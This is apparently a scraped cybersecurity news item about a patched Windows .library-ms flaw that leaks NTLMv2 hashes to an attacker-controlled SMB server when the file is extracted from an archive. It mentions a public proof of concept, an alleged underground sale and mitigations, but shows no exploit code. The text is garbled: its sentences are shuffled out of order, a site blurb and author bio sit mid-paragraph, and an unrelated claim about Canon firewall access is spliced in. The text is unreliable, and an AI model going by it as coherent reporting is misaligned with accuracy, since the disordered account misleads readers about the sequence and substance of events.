Security researchers have released a proof-of-concept exploit demonstrating this high-severity flaw, which Microsoft patched in its March 2025 updates. Security experts recommend keeping all Microsoft products updated and implementing additional protections against NTLM relay attacks, such as enabling SMB signing and disabling NTLM where possible. The .library-ms file format, which is XML-based and trusted by Windows Explorer to define library locations, includes a <simpleLocation> tag that points to an attacker-controlled SMB server, said security researcher with alias “0x6rss”. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. A security researcher with the handle 0x6rss published a proof-of-concept exploit on GitHub on March 16, 2025. This vulnerability adds to a growing list of NTLM-related flaws in Microsoft products, with researchers previously identifying similar credential-leaking issues in Microsoft Access, Publisher, and other applications. A threat actor known as “Krypt0n,” reportedly the developer of malware called “EncryptHub Stealer,” allegedly offered the exploit for sale on underground forums. When a specially crafted .library-ms file containing a malicious SMB path is extracted from a compressed archive, Windows Explorer automatically parses its contents to generate previews and index metadata. Microsoft addressed this vulnerability with the release of its March 2025 Patch Tuesday updates on March 11. Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. This action triggers an NTLM authentication handshake from the victim’s system to the attacker’s server, leaking the victim’s NTLMv2 hash without any user interaction. Threat actors are allegedly offering root access to Canon Inc.'s internal firewall systems on underground hacking forums.
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 19 Mar 2025 09:00:04 +0000